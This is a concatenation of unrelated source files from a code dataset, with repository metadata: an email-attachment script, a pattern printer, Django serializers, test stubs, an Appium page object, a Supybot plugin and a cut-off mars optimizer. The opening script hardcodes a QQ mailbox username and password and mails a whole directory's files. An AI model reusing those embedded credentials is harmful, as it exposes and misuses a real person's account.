s.connect(mail_host)
s.login(mail_user,mail_pass)
s.sendmail(me, to_list, msg.as_string())
s.close()
return True
except Exception as e:
print(e)
return False
pass
def send_mail_attach_dir(to_list,sub,content,dir_path="20150128"):
    #############
    # to_list: recipient address
    # sub: mail subject
    # content: mail body
    ###############
    # mail server, user name, password and mailbox domain suffix
mail_host="smtp.qq.com"
mail_user="744996162"
mail_pass="a1b2c3e48517343"
mail_postfix="qq.com"
me=mail_user+"<"+mail_user+"@"+mail_postfix+">"
msg=MIMEMultipart()
msg['Subject'] = sub
msg['From'] = me
msg['To'] = to_list
path_list=get_all_file(dir_path)
for file_path in path_list:
try:
att = MIMEApplication(file(file_path, 'rb').read())
att["Content-Type"] = 'application/octet-stream'
att.add_header('content-disposition','attachment',filename=file_path)
msg.attach(att)
except Exception as e:
print(e)
try:
s = smtplib.SMTP()
s.connect(mail_host)
s.login(mail_user,mail_pass)
s.sendmail(me, to_list, msg.as_string())
s.close()
return True
except Exception as e:
print(e)
return False
pass
def get_all_file(dir_path="20150128"):
file_list = []
if dir_path is None:
raise Exception("floder_path is None")
for dirpath, dirnames, filenames in os.walk(dir_path):
for name in filenames:
# print(name)
file_list.append(dirpath + '/' + name)
return file_list
if __name__=="__main__":
# excel_write2()
# to_list="744996162@qq.com"
# send_mail2(to_list,"hello","mail test")
floder_path="20150128"
file_list=get_all_file(floder_path)
for i in file_list:
print i
pass
to_list="744996162@qq.com"
send_mail_attach_dir(to_list,"hello","mail test")
|
[
"744996162@qq.com"
] |
744996162@qq.com
|
7d35d105cdd8d6255538d78fb8262fabfedcd14f
|
1e17cce2124d772871eaa7086a37e98b5af14adf
|
/Alphabets/Q.py
|
59937c56bc6e491340c16d5360de8e91efd68e2d
|
[] |
no_license
|
venukumarbv/PythonPatternPrinting
|
b5e62e23ac2e9d929a74f5b58a42116f27163889
|
3318907b8e930ada6e367cc04a0b6e314666ec24
|
refs/heads/master
| 2022-12-23T02:02:18.793081
| 2020-07-03T07:21:23
| 2020-07-03T07:21:23
| 276,833,884
| 0
| 1
| null | 2020-09-30T19:44:18
| 2020-07-03T07:14:53
|
Python
|
UTF-8
|
Python
| false
| false
| 508
|
py
|
'''
* * *
* *
* *
* *
* * *
* * *
* * * *
'''
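# The letter is drawn on a 7x5 grid: membership tests on (row, col) decide
# which cells print a star, so the shape in the docstring above is encoded
# entirely in the conditions below.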
for row in range(7):
for col in range(5):
if row in {0, 6} and col in {1, 2, 3}:
print('*', end=' ')
elif row in range(1,6) and col in {0, 4}:
print('*', end=' ')
        elif (row == 4 and col == 2) or (row == 5 and col == 3):
            print('*', end=' ')
elif row == 6 and col == 4:
print('*', end=' ')
else:
print(' ', end=' ')
print()
|
[
"VKvision@venu.com"
] |
VKvision@venu.com
|
6f349d3c153769bb6bfa800268372e30579abeb6
|
a82aa8430e32eaf62df0f44b20afb0e7d50c3d7b
|
/ippon/tournament/seralizers.py
|
8c29e4688e49aed3e000d0f5c7bfc44a4784bbeb
|
[
"MIT"
] |
permissive
|
morynicz/ippon_back
|
314daac99f79247b749dc46d59a645a6eb840263
|
dce901bfc649c6f8efbbf0907654e0860606b3e3
|
refs/heads/master
| 2022-12-20T23:33:10.898738
| 2021-10-17T09:25:39
| 2021-10-17T09:25:39
| 124,851,931
| 0
| 2
|
MIT
| 2022-12-08T12:37:26
| 2018-03-12T07:43:17
|
Python
|
UTF-8
|
Python
| false
| false
| 3,502
|
py
|
from django.contrib.auth.models import User
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
import ippon.models.player as plm
import ippon.models.tournament as tm
import ippon.player.serializers as pls
class TournamentParticipationSerializer(serializers.ModelSerializer):
is_age_ok = serializers.BooleanField(source='check_is_age_ok', read_only=True)
is_rank_ok = serializers.BooleanField(source='check_is_rank_ok', read_only=True)
is_sex_ok = serializers.BooleanField(source='check_is_sex_ok', read_only=True)
tournament_id = serializers.IntegerField(source='tournament.id')
player = pls.ShallowPlayerSerializer()
class Meta:
model = tm.TournamentParticipation
fields = (
'id',
'is_paid',
'is_registered',
'is_qualified',
'is_age_ok',
'is_rank_ok',
'is_sex_ok',
'player',
'tournament_id',
'notes'
)
def create(self, validated_data):
if not isinstance(self.initial_data['player']['id'], int):
raise ValidationError('player.id must be an integer')
filtered = plm.Player.objects.filter(pk=self.initial_data['player']['id'])
if not filtered.exists():
raise ValidationError('no such player')
participation = tm.TournamentParticipation.objects.create(
player=filtered.first(),
tournament=tm.Tournament.objects.get(pk=validated_data['tournament']['id'])
)
return participation
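    # DRF does not write through nested serializers by default, so create()
    # resolves the player id directly from initial_data instead of going
    # through the read-oriented ShallowPlayerSerializer field above.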
def update(self, instance, validated_data):
instance.is_paid = validated_data['is_paid']
instance.is_registered = validated_data['is_registered']
instance.is_qualified = validated_data['is_qualified']
instance.notes = validated_data['notes']
instance.save()
return instance
class TournamentAdminSerializer(serializers.ModelSerializer):
tournament_id = serializers.IntegerField(source='tournament.id')
user = serializers.DictField(source='get_user')
class Meta:
model = tm.TournamentAdmin
fields = (
'tournament_id',
'id',
'is_master',
'user'
)
read_only_fields = ('user',)
def create(self, validated_data):
if not isinstance(self.initial_data['user']['id'], int):
raise ValidationError('user.id must be an integer')
admin = tm.TournamentAdmin.objects.create(
user=User.objects.get(pk=self.initial_data['user']['id']),
tournament=tm.Tournament.objects.get(pk=validated_data['tournament']['id']),
is_master=False
)
return admin
def update(self, instance, validated_data):
instance.is_master = validated_data['is_master']
instance.save()
return instance
class TournamentSerializer(serializers.ModelSerializer):
class Meta:
model = tm.Tournament
fields = (
'id',
'name',
'date',
'city',
'address',
'description',
'webpage',
'team_size',
'group_match_length',
'ko_match_length',
'final_match_length',
'finals_depth',
'age_constraint',
'sex_constraint',
'rank_constraint',
'rank_constraint_value',
'age_constraint_value'
)
|
[
"morynicz@gmail.com"
] |
morynicz@gmail.com
|
a62739539e974b10b70d26d979a69301251dca72
|
c49590eb7f01df37c8ec5fef00d0ffc7250fa321
|
/test/test_res_mtf_order_cancel.py
|
b4faf84610f01187cc9e405cac99e3cb98b887c9
|
[] |
no_license
|
harshad5498/ks-orderapi-python
|
373a4b85a56ff97e2367eebd076f67f972e92f51
|
237da6fc3297c02e85f0fff1a34857aaa4c1d295
|
refs/heads/master
| 2022-12-09T19:55:21.938764
| 2020-09-03T05:22:51
| 2020-09-03T05:22:51
| 293,533,651
| 0
| 0
| null | 2020-09-07T13:19:25
| 2020-09-07T13:19:24
| null |
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
# coding: utf-8
"""
KS Trade API's
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import openapi_client
from openapi_client.models.res_mtf_order_cancel import ResMTFOrderCancel # noqa: E501
from openapi_client.rest import ApiException
class TestResMTFOrderCancel(unittest.TestCase):
"""ResMTFOrderCancel unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test ResMTFOrderCancel
        include_optional is a boolean: when False only required
params are included, when True both required and
optional params are included """
# model = openapi_client.models.res_mtf_order_cancel.ResMTFOrderCancel() # noqa: E501
if include_optional :
return ResMTFOrderCancel(
orderId = '0',
message = '0'
)
else :
return ResMTFOrderCancel(
)
def testResMTFOrderCancel(self):
"""Test ResMTFOrderCancel"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"thebhushanp@gmail.com"
] |
thebhushanp@gmail.com
|
5ffe3a1f93e81e9e2774504dd769dcc13ce6537b
|
c0c533728e049d41206282bb929bf66aedc1d154
|
/apps/application/migrations/0011_auto_20180516_0149.py
|
9ce644b45d34365c8c220b0648d3c407cf6e19b2
|
[] |
no_license
|
nolan1299/madras
|
5df425a7796fae71f3c9d6763a06aa08145d50e0
|
489f6279160622e72fcaf8654ec0c1bed7413fe8
|
refs/heads/master
| 2020-03-17T16:30:34.728894
| 2018-05-25T18:02:13
| 2018-05-25T18:02:13
| 133,751,296
| 0
| 0
| null | 2018-05-17T03:03:48
| 2018-05-17T03:03:48
| null |
UTF-8
|
Python
| false
| false
| 832
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-05-16 01:49
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('application', '0010_resume'),
]
operations = [
migrations.AddField(
model_name='resume',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='resume',
name='application',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='resumes', to='application.Application'),
),
]
|
[
"jreinstra@gmail.com"
] |
jreinstra@gmail.com
|
6f8b879786c5c0c3dc31c1641bfe4a723a5afa62
|
b2cce36e9f7dba3f393ce5a177cd4d03eced094a
|
/PageObject/me/CollectSwipeDellPage.py
|
f4c7122b39fce18cf1115b05b2baee5de90966a1
|
[] |
no_license
|
tachibana814/appium
|
180192ba0727f4ab0cdfaec54f332ce603e203b4
|
1f8945f8fa2057a46f2291d03de152af2566ad55
|
refs/heads/master
| 2021-08-22T22:34:26.056831
| 2017-12-01T13:47:57
| 2017-12-01T13:47:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,383
|
py
|
from Base.BaseStatistics import countSum, countInfo
from Base.BaseYaml import getYam
from Base.BaseOperate import OperateElement
from Base.BaseElementEnmu import Element as be
import re
class CollectSwipeDelPage:
    '''
    Swipe left to delete a collected (favorited) item.
    isOperate: if an operation step fails, the check point fails. kwargs: WebDriver driver, String path (yaml config parameters)
    '''
def __init__(self, **kwargs):
self.driver = kwargs["driver"]
if kwargs.get("launch_app", "0") == "0": # 若为空,重新打开app
self.driver.launch_app()
self.path = kwargs["path"]
self.operateElement = OperateElement(self.driver)
self.isOperate = True
test_msg = getYam(self.path)
self.testInfo = test_msg["testinfo"]
self.testCase = test_msg["testcase"]
self.testcheck = test_msg["check"]
self.get_value = []
self.msg = ""
'''
    Operation steps.
    logTest: the log recorder
'''
def operate(self, logTest):
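        # Run each configured step in order; SWIPE_LEFT steps derive the gesture from the element's on-screen geometry.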
for item in self.testCase:
result = self.operateElement.operate(item, self.testInfo, logTest)
if not result["result"]:
m_s_g = self.msg + "\n" if self.msg != "" else ""
msg = m_s_g + "执行过程中失败,请检查元素是否存在" + item["element_info"]
print(msg)
self.testInfo[0]["msg"] = msg
self.msg = m_s_g + msg
self.isOperate = False
return False
            if item.get("operate_type", "0") == be.SWIPE_LEFT:  # swipe left based on the element
web_element = self.driver.find_elements_by_id(item["element_info"])[item["index"]]
start = web_element.location
                # starting (top-left) coordinates of the element
startx = start["x"]
starty = start["y"]
                # size of the element
size1 = web_element.size
width = size1["width"]
height = size1["height"]
                # compute the element's end (bottom-right) coordinates
endX = width + startx
endY = height + starty
                self.driver.swipe(endX - 50, endY, startx + 50, endY)  # drag from the right edge to the left edge of the row
if item.get("operate_type", "0") == be.GET_VALUE:
self.get_value.append(result["text"])
return True
def checkPoint(self, **kwargs):
result = self.check(**kwargs)
if result is not True and be.RE_CONNECT:
self.msg = "用例失败重连过一次,失败原因:" + self.testInfo[0]["msg"]
kwargs["logTest"].buildStartLine(kwargs["caseName"] + "_失败重连") # 记录日志
# self.operateElement.switchToNative()
self.driver.launch_app()
self.isOperate = True
self.get_value = []
self.operate(kwargs["logTest"])
result = self.check(**kwargs)
self.testInfo[0]["msg"] = self.msg
self.operateElement.switchToNative()
countSum(result)
countInfo(result=result, testInfo=self.testInfo, caseName=kwargs["caseName"],
driver=self.driver, logTest=kwargs["logTest"], devices=kwargs["devices"], testCase=self.testCase,
testCheck=self.testcheck)
return result
'''
    Checkpoint.
    caseName: test case function name, used for statistics
    logTest: log recorder
    devices: device name
'''
def check(self, **kwargs):
result = True
m_s_g = self.msg + "\n" if self.msg != "" else ""
if self.isOperate:
for item in self.testcheck:
resp = self.operateElement.operate(item, self.testInfo, kwargs["logTest"])
if not resp["result"]: # 表示操作出现异常情况检查点为成功
print("操作失败,简单点为成功")
result = True
break
if resp["text"] in self.get_value: # 删除后数据对比
msg = m_s_g + "删除数据失败,删除前数据为:" + ".".join(self.get_value) + "当前获取的数据为:" + resp["text"]
self.msg = m_s_g + msg
print(msg)
self.testInfo[0]["msg"] = msg
break
else:
result = False
return result
if __name__ == "__main__":
pass
|
[
"284772894@qq.com"
] |
284772894@qq.com
|
ffdf703a0923d7b64e0319499dffc354cf526805
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Scripts/pyinstaller/build/lib/PyInstaller/hooks/hook-dynaconf.py
|
d8b99ecb1e4dab7a0cca50558645cd76d92825ed
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:837c53561512a82c5654188db01cd8d6fbe3b2a9eb1608240134ac0b77dda545
size 886
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
2f1a8a7c8912e0d47a5e9ad908e93778deb29aa0
|
6b7ae49d83c51c298f1ed4e5a8324db7ee393f06
|
/rms/urls.py
|
9c10cde55095b8e9e47bb26c15768b2c486c9e7b
|
[] |
no_license
|
MoTechStore/ma
|
6837596be92532f613e4b8f2bd91cbcf6daa103d
|
21a4c63f66681e2b919c8bfcfe3acf12de385205
|
refs/heads/main
| 2023-08-22T01:49:22.739313
| 2021-10-05T10:03:25
| 2021-10-05T10:03:25
| 411,613,640
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,502
|
py
|
from django.urls import include, path
from . import views
from django.contrib import admin
from django.contrib.auth import views as auth_views
urlpatterns = [
path('', views.ma, name='ma'),
path('engine/', views.ai_search, name='engine'),
path('rms/', views.index, name='rms'),
path('report/', views.download_file, name='report'),
path('doc/', views.doc_insight, name='doc'),
path('cv/', views.cv_insight, name='cv'),
path('media/', views.media_check, name='media_check'),
path('loletter/', views.LOutgoingLetter.as_view(), name='loletter'),
path('liletter/', views.LIcomingLetter.as_view(), name='liletter'),
path('dashboard/', views.dashboard, name='dashboard'),
path('manage-files/<int:pk>', views.crudAdmin.found, name='found'),
path('save-data/', views.save_data, name='save_data'),
path('letter/', views.save_letter, name='save_letter'),
path('addfile/', views.add_file, name='addfile'),
path('addletter/', views.add_letter, name='addletter'),
path('save_file/', views.save_file, name='savefile'),
path('outletter/', views.out_letter, name='outletter'),
path('search/', views.search_ai, name='search'),
path('usearch/', views.usearch, name='usearch'),
path('sentletter/', views.outing_letter, name='sentletter'),
path('manage-files/', views.ManageFileView.as_view(), name='manage_files'),
path('search/', views.search_view, name='search'),
path('lsearch/', views.search_letter, name='search_letter'),
path('test/', views.test, name='test'),
path('r_admin_list/<int:pk>/update_file/', views.update_file, name='update_file'),
path('list-files/', views.FileListView.as_view(), name='list_file'),
path('logout/', views.logout_view, name='logout'),
path('signup/', views.signup, name='signup'),
path('r_admin_list/<int:pk>', views.AdminListReadView.as_view(), name='r_admin_list'),
path('al_update/<int:pk>', views.AlUpdateView.as_view(), name='al_update'),
path('u_update/<int:pk>', views.UserUpdateView.as_view(), name='u_update'),
path('admin_list_delete/<int:pk>', views.ListItDeleteView.as_view(), name='admin_list_delete'),
path('delete_user/<int:pk>', views.DeleteUserView.as_view(), name='delete_user'),
path('users/', views.UserView.as_view(), name='users'),
path('r_admin_truck/<int:pk>', views.AListTruckReadView.as_view(), name='r_admin_truck'),
path('login/', auth_views.LoginView.as_view(template_name='crow/login.html'), name='login'),
]
|
[
"mosesnoel02@gmail.com"
] |
mosesnoel02@gmail.com
|
cd4554e2cfdb845fb82245f7c366f0dfe311f709
|
3506d8c9a8391be52d24cff54f27537a92a7228c
|
/HackerRank/Implementation/Picking_Numbers.py
|
8120850a099a18dbfc581f4ef6b163926e96aed7
|
[] |
no_license
|
saumya-singh/CodeLab
|
04ef2c61c516c417c03c6a510e8b5e6e498fbe5d
|
9371f0d6bd45e5592dae25b50f0d04ba45ae67cf
|
refs/heads/master
| 2021-09-12T05:01:17.491312
| 2018-04-14T19:48:40
| 2018-04-14T19:48:40
| 81,596,628
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 970
|
py
|
#!/bin/python3
#https://www.hackerrank.com/challenges/picking-numbers/problem
def pickingNumbers(n, a):
dictionary = {}
for element in a:
value = dictionary.get(element, "None")
if value == "None":
dictionary[element] = 1
else:
dictionary[element] = int(value) + 1
list_d = list(dictionary.items())
list_d.sort()
#print(list_d)
if len(list_d) == 1:
return list_d[0][1]
max = 0
for i in range(len(list_d)):
if max < list_d[i][1]:
max = list_d[i][1]
for i in range(len(list_d) - 1):
if abs(list_d[i][0] - list_d[i + 1][0]) == 1:
add_result = list_d[i][1] + list_d[i + 1][1]
if max < add_result:
max = add_result
return max
n = int(input().strip())
a = [int(a_temp) for a_temp in input().strip().split(' ')]
count = pickingNumbers(n, a)
print(count)
|
[
"saumya.singh0993@gmail.com"
] |
saumya.singh0993@gmail.com
|
d3c4ff20dda9054f73a27d12749f649b646cc97c
|
0791b310393b0a88ae03e05593abf921e1920951
|
/resourses/convertui.py
|
5653855d28da8e3db4670c41f89c569103ed4a0c
|
[
"MIT"
] |
permissive
|
sashgorokhov-heaven/python-vkontakte-music-gui-old
|
482ae8f84e43abbc1137f920fe445a67d81522a3
|
b57d80686d404292a35d9055ba43b0da0e5aaab2
|
refs/heads/master
| 2021-06-01T04:30:05.525614
| 2014-06-24T16:42:08
| 2014-06-24T16:42:08
| 20,318,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
__author__ = 'sashgorokhov'
__email__ = 'sashgorokhov@gmail.com'
import os, time
os.startfile('convertui.cmd')
files = [
r'..\modules\forms\downloadform\ui.py',
r'..\modules\forms\mainform\ui.py',
r'..\modules\forms\mainform\components\audiolist\components\audiolistitemwidget\ui.py',
r'..\modules\forms\downloadform\components\audiolist\components\audiolistitemwidget\ui.py'
]
time.sleep(3)
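# Rewrite each generated ui.py so 'import resourses_rc' becomes 'import resourses.resourses_rc', keeping a single occurrence.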
for file in files:
with open(file, 'r') as f:
lines = f.read().split('\n')
lines.reverse()
parsed = list()
found = False
for line in lines:
if line == 'import resourses_rc':
if found:
continue
found = True
parsed.append('import resourses.resourses_rc')
else:
parsed.append(line)
parsed.reverse()
with open(file, 'w') as f:
f.write('\n'.join(parsed))
|
[
"sashgorokhov@gmail.com"
] |
sashgorokhov@gmail.com
|
facebbe13610d58711da7060347d0e724d170152
|
4427916fafe69a32626cb5d8c02bc55c7c87f642
|
/FortyTwo/plugin.py
|
df71696ddb0010cbf8d1a2244f0c02d37bdc3f81
|
[] |
no_license
|
ki113d/Supybot-plugins
|
13f91f2fe0c01c9769a562e3d480d4f0e7fa8739
|
0d6b4447004b822acbe41fd7075cc85d8476a289
|
refs/heads/master
| 2021-04-15T07:57:27.272322
| 2012-12-30T21:35:56
| 2012-12-30T21:35:56
| 4,077,461
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,562
|
py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import time
import fnmatch
from xml.dom import minidom
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
try:
from supybot.i18n import PluginInternationalization
from supybot.i18n import internationalizeDocstring
_ = PluginInternationalization('FortyTwo')
except:
    # These are placeholder functions that allow the plugin to run on a bot
    # without the i18n plugin
_ = lambda x:x
internationalizeDocstring = lambda x:x
class Domain:
def __init__(self, dom, warnings):
self.domain = None
self.purpose = None
for node in dom.childNodes:
if not node.nodeName in 'domain purpose'.split():
warnings.append(_("Unknown node '%s'") % node.nodeName)
continue
try:
data = node.firstChild.data
except AttributeError:
# Empty purpose, for instance
data = ''
self.__dict__.update({node.nodeName: data})
assert None not in (self.domain, self.purpose)
@internationalizeDocstring
class FortyTwo(callbacks.Plugin):
"""Add the help for "@plugin help 42Chan" here
This should describe *how* to use this plugin."""
@internationalizeDocstring
def find(self, irc, msg, args, optlist):
"""[--domain <glob>] [--purpose <glob>]
Returns all the domains that matches the search. --domain and
--purpose take a glob (a string with wildcards) that have to match
the results, --resolves means the domain is resolved, and --http is
the HTTP response status (000 for a domain that isn't resolved)."""
def translate(glob):
return re.compile(fnmatch.translate(glob), re.I)
domain, purpose = translate('*'), translate('*')
resolve, http = None, None
for name, value in optlist:
if name == 'domain': domain = translate(value)
if name == 'purpose': purpose = translate(value)
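        # Refresh the cached domain list when it is missing or older than the configured lifetime.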
if not hasattr(self, '_lastRefresh') or \
self._lastRefresh<time.time()-self.registryValue('lifetime'):
self._refreshCache()
results = []
for obj in self._domains:
if not domain.match(obj.domain) or not purpose.match(obj.purpose):
continue
results.append(obj.domain)
if results == []:
irc.error(_('No such domain'))
else:
irc.reply(_(', ').join(results))
find = wrap(find, [getopts({'domain': 'glob', 'purpose': 'glob'})])
@internationalizeDocstring
def fetch(self, irc, msg, args):
"""takes no arguments
Fetches data from the domains list source."""
self._refreshCache()
irc.replySuccess()
@internationalizeDocstring
def purpose(self, irc, msg, args, domain):
"""<domain>
Returns the purpose of the given domain."""
if not hasattr(self, '_lastRefresh') or \
self._lastRefresh<time.time()-self.registryValue('lifetime'):
self._refreshCache()
for obj in self._domains:
if obj.domain == domain:
irc.reply(obj.purpose)
return
irc.error(_('No such domain'))
purpose = wrap(purpose, ['somethingWithoutSpaces'])
def _refreshCache(self):
self._lastRefresh = time.time()
xml = utils.web.getUrl(self.registryValue('source'))
dom = minidom.parseString(xml)
warnings = []
root = None
for child in dom.childNodes:
if child.nodeName == 'domains':
root = child
break
assert root is not None
self._domains = [Domain(child, warnings) for child in root.childNodes
if child.nodeName == 'item']
Class = FortyTwo
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
[
"progval@gmail.com"
] |
progval@gmail.com
|
39f23942de022147dd5876c2b5e9383005d57383
|
bb970bbe151d7ac48d090d86fe1f02c6ed546f25
|
/arouse/_dj/utils/_os.py
|
4f586b4c0305d41a7a7a672366300d62577ff519
|
[
"Python-2.0",
"BSD-3-Clause"
] |
permissive
|
thektulu/arouse
|
95016b4028c2b8e9b35c5062a175ad04286703b6
|
97cadf9d17c14adf919660ab19771a17adc6bcea
|
refs/heads/master
| 2021-01-13T12:51:15.888494
| 2017-01-09T21:43:32
| 2017-01-09T21:43:32
| 78,466,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,593
|
py
|
from __future__ import unicode_literals
import os
import sys
import tempfile
from os.path import abspath, dirname, isabs, join, normcase, normpath, sep
from arouse._dj.core.exceptions import SuspiciousFileOperation
from arouse._dj.utils import six
from arouse._dj.utils.encoding import force_text
if six.PY2:
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
# Under Python 2, define our own abspath function that can handle joining
# unicode paths to a current working directory that has non-ASCII characters
# in it. This isn't necessary on Windows since the Windows version of abspath
# handles this correctly. It also handles drive letters differently than the
# pure Python implementation, so it's best not to replace it.
if six.PY3 or os.name == 'nt':
abspathu = abspath
else:
def abspathu(path):
"""
Version of os.path.abspath that uses the unicode representation
of the current working directory, thus avoiding a UnicodeDecodeError
in join when the cwd has non-ASCII characters.
"""
if not isabs(path):
path = join(os.getcwdu(), path)
return normpath(path)
def upath(path):
"""
Always return a unicode path.
"""
if six.PY2 and not isinstance(path, six.text_type):
return path.decode(fs_encoding)
return path
def npath(path):
"""
Always return a native path, that is unicode on Python 3 and bytestring on
Python 2.
"""
if six.PY2 and not isinstance(path, bytes):
return path.encode(fs_encoding)
return path
def safe_join(base, *paths):
"""
Joins one or more path components to the base path component intelligently.
Returns a normalized, absolute version of the final path.
The final path must be located inside of the base path component (otherwise
a ValueError is raised).
"""
base = force_text(base)
paths = [force_text(p) for p in paths]
final_path = abspathu(join(base, *paths))
base_path = abspathu(base)
# Ensure final_path starts with base_path (using normcase to ensure we
# don't false-negative on case insensitive operating systems like Windows),
# further, one of the following conditions must be true:
# a) The next character is the path separator (to prevent conditions like
# safe_join("/dir", "/../d"))
# b) The final path must be the same as the base path.
# c) The base path must be the most root path (meaning either "/" or "C:\\")
if (not normcase(final_path).startswith(normcase(base_path + sep)) and
normcase(final_path) != normcase(base_path) and
dirname(normcase(base_path)) != normcase(base_path)):
raise SuspiciousFileOperation(
'The joined path ({}) is located outside of the base path '
'component ({})'.format(final_path, base_path))
return final_path
def symlinks_supported():
"""
A function to check if creating symlinks are supported in the
host platform and/or if they are allowed to be created (e.g.
on Windows it requires admin permissions).
"""
tmpdir = tempfile.mkdtemp()
original_path = os.path.join(tmpdir, 'original')
symlink_path = os.path.join(tmpdir, 'symlink')
os.makedirs(original_path)
try:
os.symlink(original_path, symlink_path)
supported = True
except (OSError, NotImplementedError, AttributeError):
supported = False
else:
os.remove(symlink_path)
finally:
os.rmdir(original_path)
os.rmdir(tmpdir)
return supported
|
[
"michal.s.zukowski@gmail.com"
] |
michal.s.zukowski@gmail.com
|
7ea6777f121d25cecdd3df4ad37bc8958faa33f6
|
f82349a5d9cb285ced7c52db1ce95c65f5fd0cf0
|
/mars/tensor/execution/optimizes/ne.py
|
34e7ee8d39dbabd98b8b5eb609277840c853c493
|
[
"MIT",
"BSD-3-Clause",
"OFL-1.1",
"LicenseRef-scancode-unknown-license-reference",
"Python-2.0",
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
pingrunhuang/mars
|
8d2602356b6f4d9eb7c6dfe4b2c4536b4bdfc229
|
ae920c374e9844d7426d0cc09c0d97059dc5341c
|
refs/heads/master
| 2020-04-17T03:42:11.147774
| 2019-01-18T06:49:29
| 2019-01-18T06:49:29
| 166,196,676
| 0
| 0
|
Apache-2.0
| 2019-01-17T09:17:25
| 2019-01-17T09:17:25
| null |
UTF-8
|
Python
| false
| false
| 4,936
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...expressions import arithmetic, reduction
from ...expressions.fuse import TensorNeFuseChunk
REDUCTION_OP = {reduction.TensorSum, reduction.TensorProd,
reduction.TensorMax, reduction.TensorMin}
SUPPORT_OP = {
arithmetic.TensorAdd, arithmetic.TensorAddConstant,
arithmetic.TensorSubtract, arithmetic.TensorSubConstant,
arithmetic.TensorMultiply, arithmetic.TensorMulConstant,
arithmetic.TensorDivide, arithmetic.TensorDivConstant,
arithmetic.TensorPower, arithmetic.TensorPowConstant,
arithmetic.TensorMod, arithmetic.TensorModConstant,
arithmetic.TensorNegative,
arithmetic.TensorAbs,
arithmetic.TensorConj,
arithmetic.TensorExp,
arithmetic.TensorLog,
arithmetic.TensorLog10,
arithmetic.TensorExpm1,
arithmetic.TensorLog1p,
arithmetic.TensorSqrt,
arithmetic.TensorEqual, arithmetic.TensorEqConstant,
arithmetic.TensorNotEqual, arithmetic.TensorNeConstant,
arithmetic.TensorLessThan, arithmetic.TensorLtConstant,
arithmetic.TensorLessEqual, arithmetic.TensorLeConstant,
arithmetic.TensorGreaterThan, arithmetic.TensorGtConstant,
arithmetic.TensorGreaterEqual, arithmetic.TensorGeConstant,
arithmetic.TensorSin,
arithmetic.TensorCos,
arithmetic.TensorTan,
arithmetic.TensorArcsin,
arithmetic.TensorArccos,
arithmetic.TensorArctan,
arithmetic.TensorSinh,
arithmetic.TensorCosh,
